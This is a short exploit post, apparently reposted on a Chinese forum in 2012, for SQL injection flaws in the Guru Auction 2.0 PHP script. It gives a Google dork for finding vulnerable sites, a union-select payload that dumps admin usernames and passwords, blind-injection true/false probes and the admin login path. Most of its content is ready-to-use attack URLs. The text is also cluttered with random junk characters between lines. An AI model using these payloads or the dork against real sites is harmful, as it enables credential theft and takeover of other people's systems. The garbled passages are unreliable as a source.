Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
3 p0 T+ U; w5 h. U+ }7 u1 }- |! v/ S- m S" |
作者 : v3n0m
7 G9 K5 k, o6 y& W6 R应用 : Guru Auction 2.0& j/ v& ]2 g O5 m( ]* X( k
Price : $49- e$ M1 ^/ P1 h7 b
Vendor : http://www.guruscript.com/
; }8 @' a, v* F1 RGoogle Dork : inurl:subcat.php?cate_id=1 X! T/ T/ V' d# m6 \! H
* o% q9 `7 u- ?; f
SQLi p0c: x o% |/ N( m/ i: |
~~~~~~~~~~2 r1 k4 p8 Z7 W$ J, w
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
$ u, G6 C( @& q: r0 T 8 Q6 e! Z' k1 m; c a
* ]' D% U' _3 `: y: H
盲注 p0c:
3 X2 Z( _3 N( B% U~~~~~~~~~~" L% t: ]6 c& ] p
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true5 K1 f) h. o0 r! g
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
1 l; P, l( _$ ~) G% Y 1 ~$ N4 d' ~- V4 Q
管理登录入口:+ P4 o$ h1 N* S( f6 q6 \7 \! M9 P
~~~~~~~~~~
" m4 x" n) K- ~http://domain.tld/[path]/admin/
) }1 K- m. P2 p7 c7 b |
发表于 2012-12-31 09:24:05
收藏
支持
反对